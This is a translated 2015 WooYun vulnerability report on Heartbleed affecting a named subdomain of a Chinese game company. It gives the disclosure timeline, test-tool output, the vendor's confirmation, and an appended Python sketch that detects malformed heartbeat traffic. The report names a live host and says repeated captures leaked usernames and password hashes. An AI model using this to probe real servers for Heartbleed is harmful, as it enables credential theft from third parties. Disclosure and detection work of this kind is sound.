
Vulnerability summary

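Bug ID: wooyun-2015-0123497

Title: Heartbleed vulnerability on a 中青宝 subsite

Vendor: 中青宝互动网络股份有限公司

Author: 紫霞仙子

Submitted: 2015-06-29 17:35

Fixed: 2015-08-13 17:58

Made public: 2015-08-13 17:58

Vulnerability type: System/service operations misconfiguration

Severity: High

Self-assessed Rank: 20

Status: Confirmed by the vendor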

Source: http://www.wooyun.org


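Vulnerability details

Disclosure status:

2015-06-29: Details reported to the vendor; awaiting vendor handling
2015-06-29: Vendor confirmed; details visible to the vendor only
2015-07-09: Details disclosed to core white hats and experts in related fields
2015-07-19: Details disclosed to regular white hats
2015-07-29: Details disclosed to intern white hats
2015-08-13: Details disclosed to the public

Brief description:

233

Detailed description:

weixin.zqgame.com

Proof of vulnerability: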

Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 1510
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
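As you can see, the username, md5(password), and X-Forwarded-For IP information can be captured.
Repeating the capture several times yields a large amount of sensitive information.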

Remediation:

~~

Copyright notice: when reposting, please credit the source 紫霞仙子@乌云
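
The proof output above shows a heartbeat record (type = 24) of 16384 bytes coming back from the server. As an added example, not part of the original report or of the tool that produced that output, the following sketch parses TLS record headers in the same type/ver/length form and flags that pattern in captured traffic. The function names and sample bytes are constructed for illustration, and it assumes the heartbeat messages are in cleartext, as they are when sent before the handshake completes.

```python
import struct

HEARTBEAT = 24  # TLS record content type for heartbeat messages (RFC 6520)

def parse_records(stream: bytes):
    """Split a one-direction TLS byte stream into (type, version, fragment)."""
    records, off = [], 0
    while off + 5 <= len(stream):
        ctype, ver, length = struct.unpack_from(">BHH", stream, off)
        frag = stream[off + 5: off + 5 + length]
        if len(frag) < length:
            break  # capture ends mid-record
        records.append((ctype, ver, frag))
        off += 5 + length
    return records

def length_mismatch(frag: bytes) -> bool:
    """Bounds check from RFC 6520: type(1) + payload_length(2) + payload
    + at least 16 bytes of padding must fit inside the record."""
    if len(frag) < 3:
        return True
    claimed = struct.unpack_from(">H", frag, 1)[0]
    return 1 + 2 + claimed + 16 > len(frag)

def flag_session(client: bytes, server: bytes):
    """Return findings for one connection (heartbeats sent in cleartext)."""
    findings = []
    requests = [f for t, _, f in parse_records(client) if t == HEARTBEAT]
    for f in requests:
        if length_mismatch(f):
            findings.append(("request-length-mismatch", len(f)))
    largest = max((len(f) for f in requests), default=0)
    for t, _, f in parse_records(server):
        if t == HEARTBEAT and len(f) > largest:
            findings.append(("oversized-response", len(f)))
    return findings

def record(ctype, body, ver=0x0302):
    """Wrap a body in a 5-byte TLS record header."""
    return struct.pack(">BHH", ctype, ver, len(body)) + body

# Constructed sample traffic (not captured from any host).
BAD_REQ = record(HEARTBEAT, struct.pack(">BH", 1, 0x4000))
BAD_RESP = record(HEARTBEAT, struct.pack(">BH", 2, 0x4000) + bytes(16381))
OK_BODY = struct.pack(">BH", 1, 4) + b"ping" + bytes(16)
OK_REQ = record(HEARTBEAT, OK_BODY)
OK_RESP = record(HEARTBEAT, b"\x02" + OK_BODY[1:])

if __name__ == "__main__":
    print(flag_session(BAD_REQ, BAD_RESP))
    print(flag_session(OK_REQ, OK_RESP))
```

Once heartbeats are encrypted only the record lengths remain visible, so the response-size comparison still applies while the payload_length check does not.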


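Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-06-29 17:57

Vendor reply:

Thank you very much for your report. After testing, the vulnerability does exist. We will fix it as soon as possible~

Latest status:

None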